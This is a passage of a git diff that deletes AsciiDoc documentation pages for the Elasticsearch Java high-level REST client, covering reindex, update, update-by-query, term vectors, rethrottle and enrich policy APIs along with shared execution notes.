-include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Create an empty +{request}+. -<2> Add the first +{tvrequest}+ to the +{request}+. -<3> Add the second +{tvrequest}+ for an artificial doc to the +{request}+. - - -The second way can be used when all term vectors requests share the same -arguments, such as index and other settings. In this case, a template -+{tvrequest}+ can be created with all necessary settings set, and -this template request can be passed to +{request}+ along with all -documents' ids for which to execute these requests. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-template] --------------------------------------------------- -<1> Create a template +{tvrequest}+. -<2> Pass documents' ids and the template to the +{request}+. - - -include::../execution.asciidoc[] - - -[id="{upid}-{api}-response"] -==== Multi Term Vectors Response - -+{response}+ allows to get the list of term vectors responses, -each of which can be inspected as described in -<>. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get a list of `TermVectorsResponse` - - diff --git a/docs/java-rest/high-level/document/reindex.asciidoc b/docs/java-rest/high-level/document/reindex.asciidoc deleted file mode 100644 index c094a5f1ab7..00000000000 --- a/docs/java-rest/high-level/document/reindex.asciidoc +++ /dev/null @@ -1,186 +0,0 @@ --- -:api: reindex -:request: ReindexRequest -:response: BulkByScrollResponse --- - -[id="{upid}-{api}"] -=== Reindex API - -[id="{upid}-{api}-request"] -==== Reindex Request - -A +{request}+ can be used to copy documents from one or more indexes into a -destination index. - -It requires an existing source index and a target index which may or may not exist pre-request. Reindex does not attempt -to set up the destination index. It does not copy the settings of the source index. You should set up the destination -index prior to running a _reindex action, including setting up mappings, shard counts, replicas, etc. - -The simplest form of a +{request}+ looks like this: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Creates the +{request}+ -<2> Adds a list of sources to copy from -<3> Adds the destination index - -The `dest` element can be configured like the index API to control optimistic concurrency control. Just leaving out -`versionType` (as above) or setting it to internal will cause Elasticsearch to blindly dump documents into the target. -Setting `versionType` to external will cause Elasticsearch to preserve the version from the source, create any documents -that are missing, and update any documents that have an older version in the destination index than they do in the -source index. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-versionType] --------------------------------------------------- -<1> Set the versionType to `EXTERNAL` - -Setting `opType` to `create` will cause `_reindex` to only create missing documents in the target index. All existing -documents will cause a version conflict. The default `opType` is `index`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-opType] --------------------------------------------------- -<1> Set the opType to `create` - -By default version conflicts abort the `_reindex` process but you can just count -them instead with: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-conflicts] --------------------------------------------------- -<1> Set `proceed` on version conflict - -You can limit the documents by adding a query. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-query] --------------------------------------------------- -<1> Only copy documents which have field `user` set to `kimchy` - -It’s also possible to limit the number of processed documents by setting `maxDocs`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-maxDocs] --------------------------------------------------- -<1> Only copy 10 documents - -By default `_reindex` uses batches of 1000. You can change the batch size with `sourceBatchSize`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-sourceSize] --------------------------------------------------- -<1> Use batches of 100 documents - -Reindex can also use the ingest feature by specifying a `pipeline`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-pipeline] --------------------------------------------------- -<1> set pipeline to `my_pipeline` - -+{request}+ also supports a `script` that modifies the document. It allows you to -also change the document's metadata. The following example illustrates that. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-script] --------------------------------------------------- -<1> `setScript` to increment the `likes` field on all documents with user `kimchy`. - -+{request}+ supports reindexing from a remote Elasticsearch cluster. When using a remote cluster the query should be -specified inside the `RemoteInfo` object and not using `setSourceQuery`. If both the remote info and the source query are -set it results in a validation error during the request. The reason for this is that the remote Elasticsearch may not -understand queries built by the modern query builders. The remote cluster support works all the way back to Elasticsearch -0.90 and the query language has changed since then. When reaching older versions, it is safer to write the query by hand -in JSON. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-remote] --------------------------------------------------- -<1> set remote elastic cluster - -+{request}+ also helps in automatically parallelizing using `sliced-scroll` to -slice on `_id`. Use `setSlices` to specify the number of slices to use. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-slices] --------------------------------------------------- -<1> set number of slices to use - -+{request}+ uses the `scroll` parameter to control how long it keeps the -"search context" alive. -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-scroll] --------------------------------------------------- -<1> set scroll time - - -==== Optional arguments -In addition to the options above the following arguments can optionally be also provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the reindex request to be performed as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh index after calling reindex - -include::../execution.asciidoc[] - -[id="{upid}-{api}-task-submission"] -==== Reindex task submission -It is also possible to submit a +{request}+ and not wait for it completion with the use of Task API. This is an equivalent of a REST request -with wait_for_completion flag set to false. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{hlrc-tests}/ReindexIT.java[submit-reindex-task] --------------------------------------------------- -<1> A +{request}+ is constructed the same way as for the synchronous method -<2> A submit method returns a `TaskSubmissionResponse` which contains a task identifier. -<3> The task identifier can be used to get `response` from a completed task. - -[id="{upid}-{api}-response"] -==== Reindex Response - -The returned +{response}+ contains information about the executed operations and -allows to iterate over each result as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get total time taken -<2> Check if the request timed out -<3> Get total number of docs processed -<4> Number of docs that were updated -<5> Number of docs that were created -<6> Number of docs that were deleted -<7> Number of batches that were executed -<8> Number of skipped docs -<9> Number of version conflicts -<10> Number of times request had to retry bulk index operations -<11> Number of times request had to retry search operations -<12> The total time this request has throttled itself not including the current throttle time if it is currently sleeping -<13> Remaining delay of any current throttle sleep or 0 if not sleeping -<14> Failures during search phase -<15> Failures during bulk index operation diff --git a/docs/java-rest/high-level/document/rethrottle.asciidoc b/docs/java-rest/high-level/document/rethrottle.asciidoc deleted file mode 100644 index cb606521a1d..00000000000 --- a/docs/java-rest/high-level/document/rethrottle.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ --- -:api: rethrottle -:request: RethrottleRequest -:response: ListTasksResponse --- - -[id="{upid}-{api}"] -=== Rethrottle API - -[id="{upid}-{api}-request"] -==== Rethrottle Request - -A +{request}+ can be used to change the current throttling on a running -reindex, update-by-query or delete-by-query task or to disable throttling of -the task entirely. It requires the task Id of the task to change. - -In its simplest form, you can use it to disable throttling of a running -task using the following: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-disable-request] --------------------------------------------------- -<1> Create a +{request}+ that disables throttling for a specific task id - -By providing a `requestsPerSecond` argument, the request will change the -existing task throttling to the specified value: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Request to change the throttling of a task to 100 requests per second - -The rethrottling request can be executed by using one of the three appropriate -methods depending on whether a reindex, update-by-query or delete-by-query task -should be rethrottled: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-execution] --------------------------------------------------- -<1> Execute reindex rethrottling request -<2> The same for update-by-query -<3> The same for delete-by-query - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -The asynchronous execution of a rethrottle request requires both the +{request}+ -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> Execute reindex rethrottling asynchronously -<2> The same for update-by-query -<3> The same for delete-by-query - -The asynchronous method does not block and returns immediately. -Once it is completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. A typical listener looks like this: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-async-listener] --------------------------------------------------- -<1> Code executed when the request is successfully completed -<2> Code executed when the request fails with an exception - -[id="{upid}-{api}-response"] -==== Rethrottle Response - -Rethrottling returns the task that has been rethrottled in the form of a -+{response}+. The structure of this response object is described in detail -in <>. diff --git a/docs/java-rest/high-level/document/term-vectors.asciidoc b/docs/java-rest/high-level/document/term-vectors.asciidoc deleted file mode 100644 index e8d4a25a2ca..00000000000 --- a/docs/java-rest/high-level/document/term-vectors.asciidoc +++ /dev/null @@ -1,101 +0,0 @@ --- -:api: term-vectors -:request: TermVectorsRequest -:response: TermVectorsResponse --- - -[id="{upid}-{api}"] -=== Term Vectors API - -Term Vectors API returns information and statistics on terms in the fields -of a particular document. The document could be stored in the index or -artificially provided by the user. - - -[id="{upid}-{api}-request"] -==== Term Vectors Request - -A +{request}+ expects an `index`, a `type` and an `id` to specify -a certain document, and fields for which the information is retrieved. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -Term vectors can also be generated for artificial documents, that is for -documents not present in the index: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-artificial] --------------------------------------------------- -<1> An artificial document is provided as an `XContentBuilder` object, -the Elasticsearch built-in helper to generate JSON content. - -===== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-optional-arguments] --------------------------------------------------- -<1> Set `fieldStatistics` to `false` (default is `true`) to omit document count, -sum of document frequencies, sum of total term frequencies. -<2> Set `termStatistics` to `true` (default is `false`) to display -total term frequency and document frequency. -<3> Set `positions` to `false` (default is `true`) to omit the output of -positions. -<4> Set `offsets` to `false` (default is `true`) to omit the output of -offsets. -<5> Set `payloads` to `false` (default is `true`) to omit the output of -payloads. -<6> Set `filterSettings` to filter the terms that can be returned based -on their tf-idf scores. -<7> Set `perFieldAnalyzer` to specify a different analyzer than -the one that the field has. -<8> Set `realtime` to `false` (default is `true`) to retrieve term vectors -near realtime. -<9> Set a routing parameter - - -include::../execution.asciidoc[] - - -[id="{upid}-{api}-response"] -==== Term Vectors Response - -+{response}+ contains the following information: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The index name of the document. -<2> The type name of the document. -<3> The id of the document. -<4> Indicates whether or not the document found. - - -===== Inspecting Term Vectors -If +{response}+ contains non-null list of term vectors, -more information about each term vector can be obtained using the following: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-term-vectors] --------------------------------------------------- -<1> The name of the current field -<2> Fields statistics for the current field - document count -<3> Fields statistics for the current field - sum of total term frequencies -<4> Fields statistics for the current field - sum of document frequencies -<5> Terms for the current field -<6> The name of the term -<7> Term frequency of the term -<8> Document frequency of the term -<9> Total term frequency of the term -<10> Score of the term -<11> Tokens of the term -<12> Position of the token -<13> Start offset of the token -<14> End offset of the token -<15> Payload of the token diff --git a/docs/java-rest/high-level/document/update-by-query.asciidoc b/docs/java-rest/high-level/document/update-by-query.asciidoc deleted file mode 100644 index 26a6bc362b1..00000000000 --- a/docs/java-rest/high-level/document/update-by-query.asciidoc +++ /dev/null @@ -1,148 +0,0 @@ --- -:api: update-by-query -:request: UpdateByQueryRequest -:response: UpdateByQueryResponse --- - -[id="{upid}-{api}"] -=== Update By Query API - -[id="{upid}-{api}-request"] -==== Update By Query Request - -A +{request}+ can be used to update documents in an index. - -It requires an existing index (or a set of indices) on which the update is to -be performed. - -The simplest form of a +{request}+ looks like this: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Creates the +{request}+ on a set of indices. - -By default version conflicts abort the +{request}+ process but you can just -count them instead with: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-conflicts] --------------------------------------------------- -<1> Set `proceed` on version conflict - -You can limit the documents by adding a query. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-query] --------------------------------------------------- -<1> Only copy documents which have field `user` set to `kimchy` - -It’s also possible to limit the number of processed documents by setting `maxDocs`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-maxDocs] --------------------------------------------------- -<1> Only copy 10 documents - -By default +{request}+ uses batches of 1000. You can change the batch size with -`setBatchSize`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-scrollSize] --------------------------------------------------- -<1> Use batches of 100 documents - -Update by query can also use the ingest feature by specifying a `pipeline`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-pipeline] --------------------------------------------------- -<1> set pipeline to `my_pipeline` - -+{request}+ also supports a `script` that modifies the document: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-script] --------------------------------------------------- -<1> `setScript` to increment the `likes` field on all documents with user `kimchy`. - -+{request}+ can be parallelized using `sliced-scroll` with `setSlices`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-slices] --------------------------------------------------- -<1> set number of slices to use - -`UpdateByQueryRequest` uses the `scroll` parameter to control how long it keeps the "search context" alive. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-scroll] --------------------------------------------------- -<1> set scroll time - -If you provide routing then the routing is copied to the scroll query, limiting the process to the shards that match -that routing value. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> set routing - - -==== Optional arguments -In addition to the options above the following arguments can optionally be also provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the update by query request to be performed as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh index after calling update by query - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Set indices options - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Update By Query Response - -The returned +{response}+ contains information about the executed operations and -allows to iterate over each result as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get total time taken -<2> Check if the request timed out -<3> Get total number of docs processed -<4> Number of docs that were updated -<5> Number of docs that were deleted -<6> Number of batches that were executed -<7> Number of skipped docs -<8> Number of version conflicts -<9> Number of times request had to retry bulk index operations -<10> Number of times request had to retry search operations -<11> The total time this request has throttled itself not including the current throttle time if it is currently sleeping -<12> Remaining delay of any current throttle sleep or 0 if not sleeping -<13> Failures during search phase -<14> Failures during bulk index operation diff --git a/docs/java-rest/high-level/document/update.asciidoc b/docs/java-rest/high-level/document/update.asciidoc deleted file mode 100644 index 35300512dfc..00000000000 --- a/docs/java-rest/high-level/document/update.asciidoc +++ /dev/null @@ -1,237 +0,0 @@ --- -:api: update -:request: UpdateRequest -:response: UpdateResponse --- - -[id="{upid}-{api}"] -=== Update API - -[id="{upid}-{api}-request"] -==== Update Request - -An +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id - -The Update API allows to update an existing document by using a script -or by passing a partial document. - -==== Updates with a script -The script can be provided as an inline script: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-inline-script] --------------------------------------------------- -<1> Script parameters provided as a `Map` of objects -<2> Create an inline script using the `painless` language and the previous parameters -<3> Sets the script to the update request - -Or as a stored script: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-stored-script] --------------------------------------------------- -<1> Reference to a script stored under the name `increment-field` in the `painless` language -<2> Sets the script in the update request - -==== Updates with a partial document -When using updates with a partial document, the partial document will be merged with the -existing document. - -The partial document can be provided in different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-doc-as-string] --------------------------------------------------- -<1> Partial document source provided as a `String` in JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-doc-as-map] --------------------------------------------------- -<1> Partial document source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-doc-as-xcontent] --------------------------------------------------- -<1> Partial document source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-shortcut] --------------------------------------------------- -<1> Partial document source provided as `Object` key-pairs, which gets converted to -JSON format - -==== Upserts -If the document does not already exist, it is possible to define some content that -will be inserted as a new document using the `upsert` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-upsert] --------------------------------------------------- -<1> Upsert document source provided as a `String` - -Similarly to the partial document updates, the content of the `upsert` document -can be defined using methods that accept `String`, `Map`, `XContentBuilder` or -`Object` key-pairs. - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for primary shard to become available as a `TimeValue` -<2> Timeout to wait for primary shard to become available as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh policy as a `WriteRequest.RefreshPolicy` instance -<2> Refresh policy as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-retry] --------------------------------------------------- -<1> How many times to retry the update operation if the document to update has -been changed by another operation between the get and indexing phases of the -update operation - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-no-source] --------------------------------------------------- -<1> Enable source retrieval, disabled by default - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-include] --------------------------------------------------- -<1> Configure source inclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-exclude] --------------------------------------------------- -<1> Configure source exclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-cas] --------------------------------------------------- -<1> ifSeqNo -<2> ifPrimaryTerm - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-detect-noop] --------------------------------------------------- -<1> Disable the noop detection - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-scripted-upsert] --------------------------------------------------- -<1> Indicate that the script must run regardless of whether the document exists or not, -ie the script takes care of creating the document if it does not already exist. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-doc-upsert] --------------------------------------------------- -<1> Indicate that the partial document must be used as the upsert document if it -does not exist yet. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-active-shards] --------------------------------------------------- -<1> Sets the number of shard copies that must be active before proceeding with -the update operation. -<2> Number of shard copies provided as a `ActiveShardCount`: can be `ActiveShardCount.ALL`, -`ActiveShardCount.ONE` or `ActiveShardCount.DEFAULT` (default) - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Update Response - -The returned +{response}+ allows to retrieve information about the executed -operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Handle the case where the document was created for the first time (upsert) -<2> Handle the case where the document was updated -<3> Handle the case where the document was deleted -<4> Handle the case where the document was not impacted by the update, -ie no operation (noop) was executed on the document - -When the source retrieval is enabled in the `UpdateRequest` -through the fetchSource method, the response contains the -source of the updated document: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-getresult] --------------------------------------------------- -<1> Retrieve the updated document as a `GetResult` -<2> Retrieve the source of the updated document as a `String` -<3> Retrieve the source of the updated document as a `Map` -<4> Retrieve the source of the updated document as a `byte[]` -<5> Handle the scenario where the source of the document is not present in -the response (this is the case by default) - -It is also possible to check for shard failures: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-failure] --------------------------------------------------- -<1> Handle the situation where number of successful shards is less than -total shards -<2> Handle the potential failures - -When a `UpdateRequest` is performed against a document that does not exist, -the response has `404` status code, an `ElasticsearchException` gets thrown -which needs to be handled as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-docnotfound] --------------------------------------------------- -<1> Handle the exception thrown because the document not exist - -If there is a version conflict, an `ElasticsearchException` will -be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-conflict] --------------------------------------------------- -<1> The raised exception indicates that a version conflict error was returned. diff --git a/docs/java-rest/high-level/enrich/delete_policy.asciidoc b/docs/java-rest/high-level/enrich/delete_policy.asciidoc deleted file mode 100644 index 9bee686cce0..00000000000 --- a/docs/java-rest/high-level/enrich/delete_policy.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ --- -:api: enrich-delete-policy -:request: DeletePolicyRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Policy API - -[id="{upid}-{api}-request"] -==== Request - -The Delete Policy API deletes an enrich policy from Elasticsearch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete policy request was acknowledged. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether delete policy request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/enrich/execute_policy.asciidoc b/docs/java-rest/high-level/enrich/execute_policy.asciidoc deleted file mode 100644 index 59594f1b741..00000000000 --- a/docs/java-rest/high-level/enrich/execute_policy.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ --- -:api: enrich-execute-policy -:request: ExecutePolicyRequest -:response: ExecutePolicyResponse --- - -[id="{upid}-{api}"] -=== Execute Policy API - -[id="{upid}-{api}-request"] -==== Request - -The Execute Policy API allows to execute an enrich policy by name. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes either the status or task id. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/enrich/get_policy.asciidoc b/docs/java-rest/high-level/enrich/get_policy.asciidoc deleted file mode 100644 index 401a78ccca6..00000000000 --- a/docs/java-rest/high-level/enrich/get_policy.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: enrich-get-policy -:request: GetPolicyRequest -:response: GetPolicyResponse --- - -[id="{upid}-{api}"] -=== Get Policy API - -[id="{upid}-{api}-request"] -==== Request - -The Get Policy API allows to retrieve enrich policies by name -or all policies if no name is provided. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes the requested enrich policy. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The actual enrich policy. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/enrich/put_policy.asciidoc b/docs/java-rest/high-level/enrich/put_policy.asciidoc deleted file mode 100644 index b8e9475bed1..00000000000 --- a/docs/java-rest/high-level/enrich/put_policy.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ --- -:api: enrich-put-policy -:request: PutPolicyRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Put Policy API - -[id="{upid}-{api}-request"] -==== Request - -The Put Policy API stores an enrich policy in Elasticsearch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the put policy request was acknowledged. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether put policy request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/enrich/stats.asciidoc b/docs/java-rest/high-level/enrich/stats.asciidoc deleted file mode 100644 index 1d4ae50238a..00000000000 --- a/docs/java-rest/high-level/enrich/stats.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ --- -:api: enrich-stats -:request: StatsRequest -:response: StatsResponse --- - -[id="{upid}-{api}"] -=== Stats API - -[id="{upid}-{api}-request"] -==== Request - -The stats API returns enrich related stats. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes enrich related stats. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> List of policies that are currently executing with - additional details. -<2> List of coordinator stats per ingest node. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/execution-no-req.asciidoc b/docs/java-rest/high-level/execution-no-req.asciidoc deleted file mode 100644 index e9a2780d1bc..00000000000 --- a/docs/java-rest/high-level/execution-no-req.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -//// -This file is included by high level rest client API documentation pages -where the client method does not use a request object. -For methods with requests, see execution.asciidoc -//// - -[id="{upid}-{api}-sync"] -==== Synchronous execution - -When executing the +{api}+ API in the following manner, the client waits -for the +{response}+ to be returned before continuing with code execution: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- - -Synchronous calls may throw an `IOException` in case of either failing to -parse the REST response in the high-level REST client, the request times out -or similar cases where there is no response coming back from the server. - -In cases where the server returns a `4xx` or `5xx` error code, the high-level -client tries to parse the response body error details instead and then throws -a generic `ElasticsearchException` and adds the original `ResponseException` as a -suppressed exception to it. - -[id="{upid}-{api}-async"] -==== Asynchronous execution - -The +{api}+ API can also be called in an asynchronous fashion so that -the client can return directly. Users need to specify how the response or -potential failures will be handled by passing a listener to the -asynchronous {api} method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The `RequestOptions` and `ActionListener` to use when the execution - completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. Failure scenarios and expected exceptions are the same as in the -synchronous execution case. - -A typical listener for +{api}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the +{api}+ call fails. diff --git a/docs/java-rest/high-level/execution.asciidoc b/docs/java-rest/high-level/execution.asciidoc deleted file mode 100644 index cbc44a24f6c..00000000000 --- a/docs/java-rest/high-level/execution.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -//// -This file is included by every high level rest client API documentation page -so we don't have to copy and paste the same asciidoc over and over again. We -*do* have to copy and paste the same Java tests over and over again. For now -this is intentional because it forces us to *write* and execute the tests -which, while a bit ceremonial, does force us to cover these calls in *some* -test. -//// - -[id="{upid}-{api}-sync"] -==== Synchronous execution - -When executing a +{request}+ in the following manner, the client waits -for the +{response}+ to be returned before continuing with code execution: - 